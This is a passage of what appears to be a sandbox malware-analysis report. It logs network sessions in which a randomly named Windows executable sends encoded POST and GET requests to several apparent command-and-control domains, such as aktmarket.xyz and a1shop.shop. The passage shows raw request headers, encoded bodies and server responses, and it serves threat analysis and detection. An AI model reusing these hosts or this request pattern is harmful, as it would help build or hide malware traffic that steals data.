                                                            Data Ascii: {N!b\4T4:T!&yPTd$]_"IW!SX-Q-GXjYKY(<O4TB$?)H)%W6v]Y8G3WY:CP!;P~HV9xv9j'{Fg7b0x+La;9;dn$A<JGcUf%!?;
                                                            Nov 24, 2024 08:14:06.687252045 CET1236INData Raw: fa 9d c4 b1 99 f4 69 92 9e c9 a4 df 49 49 33 93 be 40 d1 93 9b f4 a5 04 b1 9b f4 3b f9 c1 64 d2 db 07 dd da df c6 a4 2f b4 e4 d9 4c fa 9d 9c 65 34 a7 d3 14 3d 97 49 bf 93 96 86 26 7d 91 a6 e7 33 e9 77 2b 6e 46 93 3e 43 d4 73 99 f4 ad 7b aa 2a b1
                                                            Data Ascii: iII3@;d/Le4=I&}3w+nF>Cs{*'a|g5[k?Ixbiog&}-f6LLbt&3ZIZ=uD$'|&Y=_I&?K[l?<e0(6{. =W;w
                                                            Nov 24, 2024 08:14:06.687263966 CET328INData Raw: b1 6a ae b6 3c c2 18 50 18 03 c7 40 a3 38 07 23 33 03 c7 2f 30 cd b5 ac 06 4a ee 35 62 5f e2 a8 4e fd 7d da 03 3c 53 6c e1 11 85 3b 27 51 6d 68 82 13 f8 d9 48 e5 da b3 66 66 f4 fd 65 8f f5 d4 1f 19 f6 84 e4 87 f8 cd 7a 9e 69 13 a1 9e 62 6c 72 20
                                                            Data Ascii: j<P@8#3/0J5b_N}<Sl;'QmhHffeziblr 8Jonzs)F6e0HJ\Al3% cUT_~7n7'q;cdfuAj0veVtM65qko3U`aR2J-)_>*
                                                            Nov 24, 2024 08:14:06.687391043 CET1236INData Raw: 4a 6b d0 81 9c aa 13 bd 93 28 55 27 7c 4f 55 46 c9 21 e4 2f c3 10 f8 b4 e7 fb 12 83 fe 7a 03 72 e9 c4 17 5f da b4 4e 66 6f 4a da 43 fc 92 ec ec 5b b1 cb 27 07 c6 f9 3b 1a de 9e 01 52 ed 13 ad 97 5b 76 39 c8 fb 35 a7 c9 32 7e 71 36 8a c3 54 20 39
                                                            Data Ascii: Jk(U'|OUF!/zr_NfoJC[';R[v952~q6T 9ITJG8e*c>Jk\[oc~sUZs/I~4|s`9w$`.{#I+?0<y;tn.0'~+H{RE'Q)\XpU<?/(
                                                            Nov 24, 2024 08:14:06.687405109 CET1236INData Raw: 6e 03 62 03 40 f9 b9 21 17 28 68 00 29 af 7a aa 36 30 32 1f 48 39 a8 61 cf 8c e4 b8 c1 d6 d6 46 de 1e 28 9e 33 ec 7a 00 83 9d 15 c7 51 03 b0 47 ed b7 a7 30 c9 9b c4 23 0f 60 88 ef 81 ee a9 a2 ad ad 6d 44 96 d0 e3 01 4c ed 06 68 8e 1d a8 7d 4a 96
                                                            Data Ascii: nb@!(h)z602H9aF(3zQG0#`mDLh}J}2!7x4aHfrXQu(31CvgFm1?\7!43aTUHsS!l\E0@1p)JTUowUM;JPU>EFl{Tml:mXc$yP
                                                            Nov 24, 2024 08:14:06.687432051 CET328INData Raw: 59 e3 33 8f 68 76 f6 cc cb 38 e8 7b 36 02 f2 23 9d 33 3a 92 75 fa 52 48 9a 52 9a 7e 86 79 ed c9 d3 d0 c4 84 81 8b ff 22 5d 1d 6b 72 a1 c1 1b 2a 2b a8 29 69 72 aa 95 9d 74 f3 cb 9a 8c 8d ed a4 5a 9f 6d 38 af 98 ab 8e d0 21 5f f8 d1 50 0b bf 4e 35
                                                            Data Ascii: Y3hv8{6#3:uRHR~y"]kr*+)irtZm8!_PN5RDHJMR/<uik~%|g7qW`/<cew9*`Pudm![=#tZ);WGo%I:RUy+`<!+
                                                            Nov 24, 2024 08:14:06.687710047 CET1236INData Raw: 6e ce 24 41 10 10 c1 ab af e5 77 00 71 6d 04 cb ce 5c 7f f5 97 a1 2a f3 a2 26 76 c4 b1 c4 cb 9a 3c 93 78 71 38 1a 0c 79 49 d5 3a 23 7e 34 1e c2 4c c5 ab 8a d2 11 35 7e a4 8c c3 5f bc 2a 8a a0 77 45 5e 10 55 5e 90 34 b8 52 f1 6a d8 91 79 59 95 a0
                                                            Data Ascii: n$Awqm\*&v<xq8yI:#~4L5~_*wE^U^4RjyY1TyUD3w$_c^beZGxi8k/(^h42W^"U|aS29!li#rw,"ci9"H3C5PCQG()~K%U=%{{EQ


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.104990431.31.196.177806048C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 24, 2024 08:14:07.769908905 CET404OUTGET /9ul0/?9HaD=/8kciQFlGVV+s671hjTEMgvePijKoQKbVww8Emk+/ImbSDpFBlkIfEUbLp7Rr+tD2T8CwWTvaBp6p+1LgixmeT5OVDDglLmzebYBZGko1gl0UlPxFA==&wdv4=1RD4 HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.nartex-uf.online
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Nov 24, 2024 08:14:09.109932899 CET1236INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Sun, 24 Nov 2024 07:14:08 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Data Raw: 66 65 62 31 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 64 61 74 61 2d 70 61 6e 65 6c 2d 75 72 6c 3d 22 68 74 74 70 73 3a 2f 2f 73 65 72 76 65 72 31 39 34 2e 68 6f 73 74 69 6e 67 2e 72 65 67 2e 72 75 2f 6d 61 6e 61 67 65 72 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 26 6e 62 73 70 3b d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2f 2a 21 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a [TRUNCATED]
                                                            Data Ascii: feb1<!doctype html><html lang="ru" class="is_adaptive" data-panel-url="https://server194.hosting.reg.ru/manager"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="robots" content="noindex"><title> &nbsp;</title><style media="all">/*!*************************************************************************************************************************************************************************************************!*\ !*** css ./node_modules/css-loader/index.js??clonedRuleSet-6.use[1]!./node_modules/postcss-loader/src/index.js!./node_modules/less-loader/dist/cjs.js!./bem/blocks.adaptive/b-page/b-page.less ***! \*************************************************************************************************************************************************************************************************/.b-page{display:flex;flex-direction:column;width:100%;min-width:320px;height:100%;padding:57p [TRUNCATED]
                                                            Nov 24, 2024 08:14:09.109970093 CET1236INData Raw: 70 78 20 49 6e 74 65 72 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 2d 77 65 62 6b 69
                                                            Data Ascii: px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;background:#fff;-webkit-tap-highlight-color:transparent}html:not(.is_adaptive) .b-page{overflow-x:hidden}@media (min-width:1024px){.is_adaptive .b-page{overflow-x:hidden}}.b-page_type
                                                            Nov 24, 2024 08:14:09.109989882 CET328INData Raw: 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 30 32 34 70 78 29 7b 2e 69 73 5f 61 64 61 70 74 69 76 65 20 2e 62 2d 70 61 67 65 5f 6d 6f 62 69 6c 65 2d 6f 76 65 72 66 6c 6f 77 5f 68 69 64 64 65 6e 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65
                                                            Data Ascii: ia (min-width:1024px){.is_adaptive .b-page_mobile-overflow_hidden{overflow:visible}}.ie .b-page{display:block}.b-page__footer-down{flex:1 0 auto;overflow:hidden}.ie .b-page__footer-down{min-height:100%}@media (min-width:1024px){.is_adaptive .b
                                                            Nov 24, 2024 08:14:09.110146046 CET1236INData Raw: 69 73 69 62 6c 65 7d 2e 62 2d 70 61 67 65 5f 5f 66 6f 6f 74 65 72 2d 68 69 64 65 20 2e 62 2d 70 61 67 65 5f 5f 66 6f 6f 74 65 72 2d 64 6f 77 6e 2d 63 6f 6e 74 65 6e 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 30 7d 2e 62 2d 70 61 67 65 5f
                                                            Data Ascii: isible}.b-page__footer-hide .b-page__footer-down-content{padding-bottom:0}.b-page__footer-hide .b-footer{display:none}.b-page__content-wrapper{margin:0 auto}.b-page__content-wrapper_style_indent{padding-right:24px;padding-left:24px}.b-page__co
                                                            Nov 24, 2024 08:14:09.110198975 CET1236INData Raw: 69 6e 2d 77 69 64 74 68 3a 39 39 36 70 78 7d 7d 2e 62 2d 70 61 67 65 5f 5f 61 64 64 69 74 69 6f 6e 2d 74 69 74 6c 65 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 66 6f 6e 74 3a 37 30 30 20 32 30 70 78 2f 33 30 70 78 20 49 6e 74 65 72 2c 41 72 69 61 6c 2c
                                                            Data Ascii: in-width:996px}}.b-page__addition-title{float:left;font:700 20px/30px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;line-height:58px}.b-page__addition-title-link{text-decoration:none}.b-page__addition-title-link:hover{text-decoratio
                                                            Nov 24, 2024 08:14:09.110213041 CET328INData Raw: 20 2e 62 2d 70 61 67 65 5f 6f 76 65 72 66 6c 6f 77 5f 76 69 73 69 62 6c 65 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 7d 0a 2f 2a 21 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a
                                                            Data Ascii: .b-page_overflow_visible{overflow:visible}}/*!**********************************************************************************************************************************************************************************************!*\
                                                            Nov 24, 2024 08:14:09.110460997 CET1236INData Raw: 6f 73 74 63 73 73 2d 6c 6f 61 64 65 72 2f 73 72 63 2f 69 6e 64 65 78 2e 6a 73 21 2e 2f 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 2f 6c 65 73 73 2d 6c 6f 61 64 65 72 2f 64 69 73 74 2f 63 6a 73 2e 6a 73 21 2e 2f 62 65 6d 2f 62 6c 6f 63 6b 73 2e 67 75 69
                                                            Data Ascii: ostcss-loader/src/index.js!./node_modules/less-loader/dist/cjs.js!./bem/blocks.guide/b-text/b-text.less ***! \***********************************************************************************************************************************
                                                            Nov 24, 2024 08:14:09.110474110 CET1236INData Raw: 69 67 2d 63 6f 6d 70 61 63 74 2e 62 2d 74 65 78 74 5f 6d 61 72 67 69 6e 5f 74 6f 70 2c 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 62 69 67 2e 62 2d 74 65 78 74 5f 6d 61 72 67 69 6e 5f 74 6f 70 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 32 70 78 7d 2e 62
                                                            Data Ascii: ig-compact.b-text_margin_top,.b-text_size_big.b-text_margin_top{margin-top:42px}.b-text_size_big-compact{font:32px/36px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:42px}.b-text_size_large{font:24px/36px Inter,Arial,H
                                                            Nov 24, 2024 08:14:09.110486031 CET328INData Raw: 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 38 70 78 7d 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 73 6d 61 6c 6c 2d 63 6f 6d 70 61 63 74
                                                            Data Ascii: a Neue,Helvetica,FreeSans,sans-serif;margin-bottom:18px}.b-text_size_small-compact.b-text_margin_top,.b-text_size_small.b-text_margin_top{margin-top:18px}.b-text_size_small-compact{font:12px/12px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,s
                                                            Nov 24, 2024 08:14:09.110893011 CET1236INData Raw: 65 78 74 5f 73 69 7a 65 5f 67 69 61 6e 74 5c 40 64 65 73 6b 74 6f 70 7b 66 6f 6e 74 3a 37 32 70 78 2f 38 34 70 78 20 49 6e 74 65 72 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61
                                                            Data Ascii: ext_size_giant\@desktop{font:72px/84px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:84px}html:not(.is_adaptive) .b-text_size_giant-compact\@desktop.b-text_margin_top,html:not(.is_adaptive) .b-text_size_giant\@desktop.
                                                            Nov 24, 2024 08:14:09.229722023 CET1236INData Raw: 3a 33 32 70 78 2f 33 36 70 78 20 49 6e 74 65 72 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a
                                                            Data Ascii: :32px/36px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:42px}html:not(.is_adaptive) .b-text_size_large\@desktop{font:24px/36px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:36px}html:not(.is_a


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.104992313.248.169.48806048C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 24, 2024 08:14:15.518095016 CET666OUTPOST /4mbo/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.aktmarket.xyz
                                                            Origin: http://www.aktmarket.xyz
                                                            Referer: http://www.aktmarket.xyz/4mbo/
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 193
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Data Raw: 39 48 61 44 3d 65 59 41 36 76 65 75 4c 4b 77 2b 32 2f 4d 66 73 6f 48 61 41 4a 56 35 5a 6e 71 65 4b 37 63 73 6d 43 6f 39 6a 76 42 35 32 55 77 2f 79 6c 55 37 58 7a 51 6b 77 31 30 6d 35 50 6e 6a 48 52 71 2b 72 37 4d 55 55 66 41 65 75 4b 66 4e 64 53 36 36 6b 42 61 45 4d 58 70 32 65 4b 41 6e 5a 78 58 7a 76 41 4f 43 64 78 6b 57 6c 37 77 43 49 6e 36 4d 2f 73 4d 35 47 36 6f 74 64 36 53 67 78 59 49 49 6e 63 7a 66 4b 4a 6f 33 6d 30 46 62 49 48 61 62 57 56 34 35 35 79 63 39 79 43 78 58 78 61 49 6d 6d 46 75 7a 4e 30 34 6b 77 66 34 79 44 46 73 49 76 54 4b 4e 5a 67 52 74 30 79 62 46 4d
                                                            Data Ascii: 9HaD=eYA6veuLKw+2/MfsoHaAJV5ZnqeK7csmCo9jvB52Uw/ylU7XzQkw10m5PnjHRq+r7MUUfAeuKfNdS66kBaEMXp2eKAnZxXzvAOCdxkWl7wCIn6M/sM5G6otd6SgxYIInczfKJo3m0FbIHabWV455yc9yCxXxaImmFuzN04kwf4yDFsIvTKNZgRt0ybFM


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.104992913.248.169.48806048C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 24, 2024 08:14:18.182549953 CET690OUTPOST /4mbo/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.aktmarket.xyz
                                                            Origin: http://www.aktmarket.xyz
                                                            Referer: http://www.aktmarket.xyz/4mbo/
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 217
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Data Raw: 39 48 61 44 3d 65 59 41 36 76 65 75 4c 4b 77 2b 32 2b 73 50 73 72 6b 69 41 65 6c 35 59 69 71 65 4b 78 38 73 63 43 6f 35 6a 76 41 38 37 55 43 62 79 69 31 4c 58 79 55 77 77 30 30 6d 35 46 48 6a 4f 4d 36 2f 6c 37 4d 51 63 66 45 43 75 4b 65 70 64 53 2f 65 6b 43 70 38 50 58 35 32 63 47 67 6e 62 31 58 7a 76 41 4f 43 64 78 6b 53 62 37 77 71 49 6e 70 6b 2f 71 70 5a 46 33 49 74 65 35 53 67 78 63 49 49 6a 63 7a 66 34 4a 71 44 59 30 48 54 49 48 61 4c 57 56 4e 56 2b 34 63 39 6f 66 42 57 2b 65 4b 6d 6a 4e 4d 7a 6b 75 37 45 6c 49 75 32 59 47 4e 31 6f 43 62 73 4f 7a 6d 78 36 38 64 77 6d 4f 6c 30 4c 4c 37 55 59 75 58 7a 78 38 33 79 49 78 53 37 45 55 67 3d 3d
                                                            Data Ascii: 9HaD=eYA6veuLKw+2+sPsrkiAel5YiqeKx8scCo5jvA87UCbyi1LXyUww00m5FHjOM6/l7MQcfECuKepdS/ekCp8PX52cGgnb1XzvAOCdxkSb7wqInpk/qpZF3Ite5SgxcIIjczf4JqDY0HTIHaLWVNV+4c9ofBW+eKmjNMzku7ElIu2YGN1oCbsOzmx68dwmOl0LL7UYuXzx83yIxS7EUg==


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.104993613.248.169.48806048C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 24, 2024 08:14:20.851950884 CET1703OUTPOST /4mbo/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.aktmarket.xyz
                                                            Origin: http://www.aktmarket.xyz
                                                            Referer: http://www.aktmarket.xyz/4mbo/
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 1229
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Data Raw: 39 48 61 44 3d 65 59 41 36 76 65 75 4c 4b 77 2b 32 2b 73 50 73 72 6b 69 41 65 6c 35 59 69 71 65 4b 78 38 73 63 43 6f 35 6a 76 41 38 37 55 43 54 79 6c 47 44 58 7a 31 77 77 33 30 6d 35 62 58 6a 44 4d 36 2f 6f 37 49 38 59 66 45 4f 51 4b 63 68 64 53 5a 53 6b 48 59 38 50 43 4a 32 63 63 41 6e 65 78 58 7a 32 41 4f 53 52 78 6b 43 62 37 77 71 49 6e 73 67 2f 74 38 35 46 78 49 74 64 36 53 67 39 59 49 49 48 63 33 7a 6f 4a 70 76 49 33 33 7a 49 48 37 37 57 47 4c 42 2b 30 63 39 75 65 42 58 68 65 4b 72 7a 4e 4d 2f 67 75 36 67 50 49 70 61 59 56 37 30 70 59 5a 38 7a 72 47 35 47 33 76 30 42 4f 53 73 50 4d 6f 46 69 76 55 6a 70 6e 30 7a 48 6b 32 79 51 44 38 4c 69 73 52 30 74 53 48 30 4a 58 39 4e 55 55 70 4e 73 45 32 54 41 6a 62 38 70 4c 4d 32 5a 32 42 77 6f 71 55 39 63 41 6c 61 65 69 68 57 79 61 69 44 44 41 30 53 70 74 69 6c 49 78 4a 78 4d 4b 4a 64 63 67 53 55 49 67 49 69 56 54 31 79 4e 4c 6c 6e 5a 56 77 51 48 33 53 79 6e 37 78 69 73 6c 69 34 71 66 63 66 45 78 68 64 39 59 42 30 73 47 6d 70 67 68 50 73 56 32 57 77 45 62 [TRUNCATED]
                                                            Data Ascii: 9HaD=eYA6veuLKw+2+sPsrkiAel5YiqeKx8scCo5jvA87UCTylGDXz1ww30m5bXjDM6/o7I8YfEOQKchdSZSkHY8PCJ2ccAnexXz2AOSRxkCb7wqInsg/t85FxItd6Sg9YIIHc3zoJpvI33zIH77WGLB+0c9ueBXheKrzNM/gu6gPIpaYV70pYZ8zrG5G3v0BOSsPMoFivUjpn0zHk2yQD8LisR0tSH0JX9NUUpNsE2TAjb8pLM2Z2BwoqU9cAlaeihWyaiDDA0SptilIxJxMKJdcgSUIgIiVT1yNLlnZVwQH3Syn7xisli4qfcfExhd9YB0sGmpghPsV2WwEbz9tq58cr2YJ6xYNaVNwo2xURSI7VTP6pwVJBBIkcGMVBQA0uupoV/XzZQtfWZquuc3CSYP/YrcZW4DL8kDl89Y8ZEBYXLLIIB9GXx+cCme8lNJWfoVjpxk144elE/ywJXBEbe7I77k1toR3kLhsXwOmqqgz4ha9jYybS0N9XiREARERkY/Pyrw2E5c/7M6vubGKWUcnDxCAxsIOkw4iZ2UWJRVqYoraN7qcZxuGg5Jqiub0An6MQxXTrnrgPfQbpeKdSjJMV3WmcqrAPKEzZ/CWrOpptsEhif+zSWd+U3CS1U/yhFC3bhywCD4ywpjpJijtO0t2ueffCw36cNzoXsFmPnCh6bmfPL/YMe9mXuubz+n+iCLtCBsaM8fmqzinLcHJaHV8SzNl/pirGviHNyOisfqIK+j0o3mGZuqFROO4sVFp0nvh0S3rBETt1R+xFxuQE0Ut3L3UNc3g45XUq7piMGhT0NKQV3vKzhT9wcV1CAlkJEiE+EG0n5meTD7Qlb3xHzUzSmWVPmtwU9/shfi4Fs9fPKZfFB2coYaN4MMiZtlkMzdYEo6pG37Kl+bQtG8fEK+f1vbROwnM0OSKFa17ezoj5wZWl3WooMybQli4/ppV8rII54h5Kmxx0iguajg1U8jXhx/laseUyiDbbNmaflGfV2uokug [TRUNCATED]


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.104994313.248.169.48806048C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 24, 2024 08:14:23.503890038 CET401OUTGET /4mbo/?9HaD=TaoaspSuXCWG+J6Qu2ekK1wrjY2r/s8nGO1Ev0B6QwWm63/Js3V07H2UbHrGJNHujJI3HhKgRchyd4beF5Q/e7/FZQPmwnmSAvyJ8G6Q9CuC8rAD3Q==&wdv4=1RD4 HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.aktmarket.xyz
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Nov 24, 2024 08:14:24.686172009 CET386INHTTP/1.1 200 OK
                                                            Server: openresty
                                                            Date: Sun, 24 Nov 2024 07:14:24 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 246
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 39 48 61 44 3d 54 61 6f 61 73 70 53 75 58 43 57 47 2b 4a 36 51 75 32 65 6b 4b 31 77 72 6a 59 32 72 2f 73 38 6e 47 4f 31 45 76 30 42 36 51 77 57 6d 36 33 2f 4a 73 33 56 30 37 48 32 55 62 48 72 47 4a 4e 48 75 6a 4a 49 33 48 68 4b 67 52 63 68 79 64 34 62 65 46 35 51 2f 65 37 2f 46 5a 51 50 6d 77 6e 6d 53 41 76 79 4a 38 47 36 51 39 43 75 43 38 72 41 44 33 51 3d 3d 26 77 64 76 34 3d 31 52 44 34 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?9HaD=TaoaspSuXCWG+J6Qu2ekK1wrjY2r/s8nGO1Ev0B6QwWm63/Js3V07H2UbHrGJNHujJI3HhKgRchyd4beF5Q/e7/FZQPmwnmSAvyJ8G6Q9CuC8rAD3Q==&wdv4=1RD4"}</script></head></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            9192.168.2.104995913.248.169.48806048C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 24, 2024 08:14:30.302067041 CET660OUTPOST /5cnx/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.a1shop.shop
                                                            Origin: http://www.a1shop.shop
                                                            Referer: http://www.a1shop.shop/5cnx/
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 193
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Data Raw: 39 48 61 44 3d 6c 57 79 70 58 48 6a 39 39 57 4c 45 42 47 55 6c 52 51 37 2f 6b 36 34 54 6a 72 72 46 41 68 4d 6f 38 64 72 66 52 36 63 65 33 67 4e 6d 41 45 62 30 70 31 2f 74 4b 38 6c 30 34 36 56 33 7a 62 5a 66 49 6b 66 36 4e 67 73 36 2b 43 6a 38 72 43 7a 4d 36 65 6b 74 36 68 4a 72 64 41 77 62 4b 39 55 30 58 67 56 73 57 2f 46 6c 73 36 47 54 58 73 57 6e 6e 62 71 4a 2b 45 46 75 6a 36 4f 46 7a 58 76 6a 42 42 34 6c 48 67 47 72 71 44 78 2b 50 59 42 51 4f 31 2b 59 6e 63 39 65 75 34 46 77 6d 6f 51 70 42 58 7a 6d 79 4e 51 45 47 33 41 74 70 2b 33 44 32 75 4e 58 57 45 61 64 55 59 52 2b
                                                            Data Ascii: 9HaD=lWypXHj99WLEBGUlRQ7/k64TjrrFAhMo8drfR6ce3gNmAEb0p1/tK8l046V3zbZfIkf6Ngs6+Cj8rCzM6ekt6hJrdAwbK9U0XgVsW/Fls6GTXsWnnbqJ+EFuj6OFzXvjBB4lHgGrqDx+PYBQO1+Ync9eu4FwmoQpBXzmyNQEG3Atp+3D2uNXWEadUYR+


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            10192.168.2.104996713.248.169.48806048C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 24, 2024 08:14:32.961981058 CET684OUTPOST /5cnx/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.a1shop.shop
                                                            Origin: http://www.a1shop.shop
                                                            Referer: http://www.a1shop.shop/5cnx/
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 217
                                                            Connection: close
